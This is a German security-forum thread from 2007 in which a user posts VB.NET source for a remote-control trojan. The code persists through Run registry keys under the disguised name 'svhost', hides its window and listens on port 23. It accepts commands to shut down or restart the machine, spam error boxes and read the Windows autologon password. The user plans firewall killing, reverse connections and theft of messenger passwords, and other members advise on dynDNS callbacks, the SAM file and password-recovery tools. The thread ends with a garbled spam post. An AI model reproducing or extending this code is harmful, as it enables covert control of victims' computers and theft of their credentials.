Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=e389cee6d9165d6fb056ac3108f9fdff profile.php?mode=register&sid=e389cee6d9165d6fb056ac3108f9fdff faq.php?sid=e389cee6d9165d6fb056ac3108f9fdff memberlist.php?sid=e389cee6d9165d6fb056ac3108f9fdff search.php?sid=e389cee6d9165d6fb056ac3108f9fdff index.php?sid=e389cee6d9165d6fb056ac3108f9fdff

Foren-bersicht » Programmierung » [VB.NET] Fragen Gehe zu Seite 1, 2  Weiter
Neues Thema erffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nchstes Thema anzeigen 
[VB.NET] Fragen
BeitragVerfasst am: 15.01.2007 16:54 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beitrge: 80
Wohnort: /desktop/papierkorb




1. Wei einer wie ich einen Wert auslese? ich will nhmlich das psw des aktuellen users auslesen

2. wisst ihr wo die psws von icq, msn usw gespeichert werden?
3. Wie kann ich die Maus (, Tastatur) blockieren?
wenn ich die Maus so blocke:
Code:

Declare Function ShowCursor Lib "user32" (ByVal _bShow As Long) As Long

Windows.Forms.Cursor.Hide()


kommt ein fehler

ich hoffe ihr knnt mir helfen

cya Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 25.01.2007 18:43 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beitrge: 80
Wohnort: /desktop/papierkorb




hi
es whre schon schn wenn ich mal eine antwort erhalte^^

hier der vorlufige code (mit ein paar fehlern):

Code:
Option Explicit On
Imports System.net



Public Class Form1

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Dim path = My.Application.Info.DirectoryPath.ToString()
        Dim appl = My.Application.Info.AssemblyName & ".exe"
        Dim regkey = path & "\" & appl
     

       My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "svhost", regkey)
        My.Computer.Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "svhost", regkey)
        Me.Visible = False

        Dim objServer As New Sockets.TcpListener(IPAddress.Any, 23) 'Server auf Ip, Port setzen
        objServer.Start() 'Server Starten

        Do
            Threading.Thread.Sleep(100) 'auf Client warten
        Loop Until objServer.Pending

        Dim objClient As Sockets.TcpClient = objServer.AcceptTcpClient
        Dim objStream As Sockets.NetworkStream = objClient.GetStream

        Dim data As Byte() = System.Text.Encoding.ASCII.GetBytes("Befehl: ")
        objStream.Write(data, 0, data.Length)




        Dim input(0) As Byte


        Do

            Dim blnEnter As Boolean = False
            Dim strb As New System.Text.StringBuilder

            Do
                objStream.Read(input, 0, 1)

                If input(0) = 10 Then
                    blnEnter = True
                ElseIf input(0) <> 13 Then 'enter besteht aus einer 10 (line feed) und einer 13 (carriage return) (sinnloserweise finde ich) die 13 wird hier ignoriert weggesplt
                    strb.Append(System.Text.Encoding.ASCII.GetString(input))
                End If

            Loop Until blnEnter


            Dim output As String = strb.ToString
            'MsgBox(output)
            If output.StartsWith("MSG") Then
                MsgBox(output.Substring(4))
            End If

            Select Case output
                Case "SHUTDOWN"
                    Try
                        Process.Start("shutdown -s -f -t 3")
                    Catch ex As Exception
                        Process.Start("shutdown -s -f")
                    End Try

                Case "RESTART"
                    Try
                        Process.Start("shutdown -r -f -t 3")
                    Catch ex As Exception
                        Process.Start("shutdown -r -f")
                    End Try
                Case "FEHLER"
                    Dim i
                    For i = 1 To 1000
                        MsgBox("Schwerer Ausnahmefehler: x0723D6F5S7 & x0056F52f", MsgBoxStyle.Critical)
                    Next
                Case "BEEP"
                    Dim i
                    For i = 1 To 1000
                        My.Computer.Audio.PlaySystemSound(Media.SystemSounds.Beep)
                        Threading.Thread.Sleep(300)
                    Next
                Case "PSW"
                    Dim pswcomp = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "DefaultPassword", "")
                    Dim psw As Byte() = System.Text.Encoding.ASCII.GetBytes("PSW des Computers: " & pswcomp)
                    objStream.Write(psw, 0, psw.Length)

             
            End Select

        Loop
    End Sub



End Class



weitere funktionen bei denen ich noch nich herraus gefunden habe wie ich das hinbiegen soll ist:

- CD Tray ffnen und schlieen
- Blue Screen an/aus (also eigendliche alles Blockieren tastatur und maus ausblenden und dann ein form maximieren und blau frben - so wrd ichs machen)
- Durche den Router (das wei ich schon wie ichs mach also vom opfer connecten an meine ip )
- Firewalls killen (ich htte mir vorgestellt: eine liste mit allen bekannten firewalls und dann die prozesse killen)
- Programm in den Autostartordner kopieren (wei die funktion nich^^)
- Updaten (das is das wichtigste - zuerst wollt ichs mit der vb internen update funktion machen aber das is nich sooo gut)
- Passwrter auslesen: das computer psw les ich aus der registry aus:

Code:
Dim pswcomp = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", "DefaultPassword", "")

aber in der schule geht das nicht weil wir da auf die registry nich zugreifen knnen
- MSN, ICQ, Aim und sonstige passwrter ich find einfach net raus wo die gespeichert werden
- das das Programm nach raus connecten kann braucht es meine ip also -> also der client geht auf einen ftp server und schreibt in eine ip.txt meine ip, der server wiederum liest sie aus und connectet. wenn der client
runterfhrt wird die ip.txt gelscht das sagt dem server dann das er nicht connecten kann aber wenn ich das mit

Code:

 My.Computer.Network.DownloadFile("http://htnrevision.ht.funpic.de/", "ip.txt", "htnrevision", "??????")


mache kommt eine ip.txt auf meine pc aber da ist nix drinn

das kann er schon alles(nich allzuviel):

- Beliebige MSg boxen senden
- Runterfahren
- Restarten
- Fehlermeldungen anzeigen (1000^^)
- Beeps ausgeben (1000^^)
- PSW auslesen

also ich hoffe ihr knnt mir meine Fragen beantworten

cya Kaito


Zuletzt bearbeitet von Kaito am 11.02.2007 13:59, insgesamt einmal bearbeitet

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 25.01.2007 19:03 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beitrge: 569
Wohnort: /proc




Hi,

ich kann zwar kein VB.NET oder vergleichbares aber wenn du z.B. dienste einer Firewall oder einer Antivierensoftware abschiesen mchtes, brauchst du auch die entsprechenden Rechte.
Am besten wre es wenn du in dir einige Schwchen des Eventhandling von Windows zu nutze machst. Ob das mit VB realisierbar ist, wei ich nicht.
Ganz interessant sollte fr dich folgendes schon lteres Video sein:
http://ulm.ccc.de/ChaosSeminar/2004/12_Personal_Firewalls?highlight=%28ChaosSeminar%2F2004%29

Aber es muss gesagt sein das die Vortrger nicht umbedingt kompetent erscheinen (wieviele bits hatte gleich noch eine IP ?).

Beachten solltes du noch, das es einem Benutzer auch nicht gestattet sein kann, den Rechner herunterzufahren zu knnen.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 25.01.2007 19:22 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beitrge: 357
Wohnort: /dev/RL




Mein Tipp: Leg dir ne dynDNS zu und lass den Trojaner auf die connecten... Dann hast du das Problem mit der ip.txt nicht mehr...

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 25.01.2007 22:02 Antworten mit Zitat
Lukas
Anmeldedatum: 31.12.2005
Beitrge: 257
Wohnort: Wien




Hi, Duddits!

Das ist ein guter Link, den kenn ich schon aber leider sind da viele Sachen nicht mehr aktuell.

Autoklicker, und httpshell sind noch mglich aber der Rest drfte nicht mehr mglich sein.

@Kaito:

Konzentrier dich nicht nur auf die Prozesse Wink, SPF wird zB auch nicht im TM angezeigt.

Mfg
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 26.01.2007 15:32 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beitrge: 80
Wohnort: /desktop/papierkorb




Danke fr die Antworten.

das Video ist sehr interresant habs aber nicht ganz angeschaut war mir zu lange

@pharaoh ich hab ne dyndns kaito.selfip.net

@lukas ich versteh nicht ganz was du mit spf meinst

cu Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 26.01.2007 15:41 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beitrge: 357
Wohnort: /dev/RL




SPF is anscheinend ein Programm, das nicht als Task, sondern als Service luft

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 26.01.2007 15:46 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beitrge: 80
Wohnort: /desktop/papierkorb




ich wei schon was es ist^^
sygatepersonalfirewall

cu

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 28.01.2007 19:08 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beitrge: 80
Wohnort: /desktop/papierkorb




hi

wisst ihr vielleicht wie das msn passwort verschlsselt ist?
ich hatte mal eine vbs datei die das entschlsseln konnte aber ich find sie nichtmehr -.-

und wisst ihr wo das icq psw gespeichert wird und ob das verschlsselt wird?

das passwort vom computer lies ich aus der registry raus aus:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword
ich wei aber nich ob das stimmt weil in der schule gehts nicht.

cya

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 28.01.2007 19:23 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beitrge: 369
Wohnort: /offtopic




Hi,
ich habe Trillian, da wird das Passwort verschlsselt in folgender Datei gespeichert:
~Trillian\users\default\aim.ini
Von ICQ habe ich leider keine Ahnung.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword
existiert bei mir nicht.^^
Wird der Eintrag vielleicht nur bei Autologin gespeichert?
berlicherwese findest du die Passwrter aber in:
C:\WINDOWS\system32\config\SAM

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstrung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 28.01.2007 19:26 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beitrge: 782
Wohnort: Engelskirchen




Ja, so ist es:
http://www.winstuff.de/show_registry.html?sid=43

Du solltest bedenken, dass die wenigsten Benutzer den Autologon benutzen, weil sie den Computer in der Familie verwenden und jeder seinen eigenen Benutzer hat. Meistens haben jedoch trotzdem alle Administratorrechte.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 28.01.2007 19:33 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beitrge: 80
Wohnort: /desktop/papierkorb




ich hab aber kein autologin aktiviert^^

egal aber die sam ist doch verschlsselt oder?

der lukas hat mir ein programm gezeigt lsadump2 das funkt aber nicht
jetzt hab ich mir gedacht das man vielleicht able dafr verwenden knnte?

wo das msn psw gespeichert wird wei ich schon aber wie es verschlsselt wird ist die frage

cya Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 28.01.2007 19:51 Antworten mit Zitat
4lx
Anmeldedatum: 02.01.2006
Beitrge: 369
Wohnort: /offtopic




Probier's doch aus. Smile

Du hast ja wahrscheinlich MSN, also setzt doch dein Passwort auf einen Wert, der hchtwahrscheinlich in einer Rainbowtable ist, z.B. "test", und zhle dann die Zeichen des Hashes um eine Verschlsselung in die engere Auswahl ziehen zu knnen, dann packste das in die Suchmaschine der erwhnten Datebank fr Rainbowtables und wenn dann dein gewhltes Passwort wieder herauskommt, weite ja was es ist. Razz

_________________
"Das Staunen ist Anfang der Erkenntnis." -Platon

"Terrorismus ist die Zerstrung von Versorgungseinrichtungen, also Deichen, Wasserwerken, Krankenhusern, Kraftwerken. Eben alles das, worauf die amerikanischen Bombenangriffe gegen Nordvietnam seit 1965 systematisch abzielten. Der Terrorismus operiert mit der Angst der Massen." - Ulrike Meinhof
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID ICQ-Nummer
BeitragVerfasst am: 28.01.2007 20:33 Antworten mit Zitat
Kaito
Anmeldedatum: 12.01.2006
Beitrge: 80
Wohnort: /desktop/papierkorb




ich hab schon etwas gefunden^^

http://www.nirsoft.net/password_recovery_tools.html

funkt prima

cya Kaito

_________________
Meine Seite:

www.sharerama.de

Sie ist noch im Aufbau
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden ICQ-Nummer
BeitragVerfasst am: 19.03.2021 04:19 Antworten mit Zitat
warganic
Anmeldedatum: 26.02.2021
Beitrge: 258570




расс162.4BettBettMariClubGhosLouiUmusКереGeraJuliCUTI
1с76БериFiskКубаPrelосноMalgМошнTerrTescSifrкандTefa
Н107TsubсертErbaГалуУорт(ИспГамиСН01JeweGreeFighфант
RexoReacсертPeteFullоднаOreaMabyKathPrivКупрРазмТриб
wwwnMuddSpacviscgunmSergAaroXVIIDestЛукаМиркwhitфаку
NikiDeepHungClubTrasRobeШиллподгXVIIспраEmilFredСкар
MAGIфакуГораWindZoneКЛ-3XVIIZoneгерочистDaryТороCath
меняэнеранглSwarкараустрDaviКатыЛисеJohaNintIolaКурн
свящRidlSonyArthнаучTrevFerdMartрабоJameWindKarlВолх
фарфEpluзверEmotKronPadrтрудDaviLukeSansприсWoodRivo
шерсLineРазмARAGРоссревезабоBlueБ401PastпазлДиамАлей
инстEnhaPianSargIsleFabeBOSCвходBaldЩг-1Жан-БелеvaSc
DungXVIIHeroqбдтЛитРАлекWhat(192МедвНевзНериАзбуПавл
ПетеДмитвперчелослужDelgдопоLeonпедасвятКиевупрарасс
киноСочеоргаКоряWhatЛашустихKimbСадиСиниAfraМоисисце
(195(УраГран39-5письЛыкоЕжовКоваКоноЛютоEpluEpluEplu
SkinсчитBlakDreaуведМироиздаFranTracКурбЕгорThistuchkas
updaпарт
Benutzer-Profile anzeigen Private Nachricht senden
[VB.NET] Fragen
Foren-bersicht » Programmierung
Du kannst keine Beitrge in dieses Forum schreiben.
Du kannst auf Beitrge in diesem Forum nicht antworten.
Du kannst deine Beitrge in diesem Forum nicht bearbeiten.
Du kannst deine Beitrge in diesem Forum nicht lschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 2  
Gehe zu Seite 1, 2  Weiter
  
  
 Neues Thema erffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche bersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum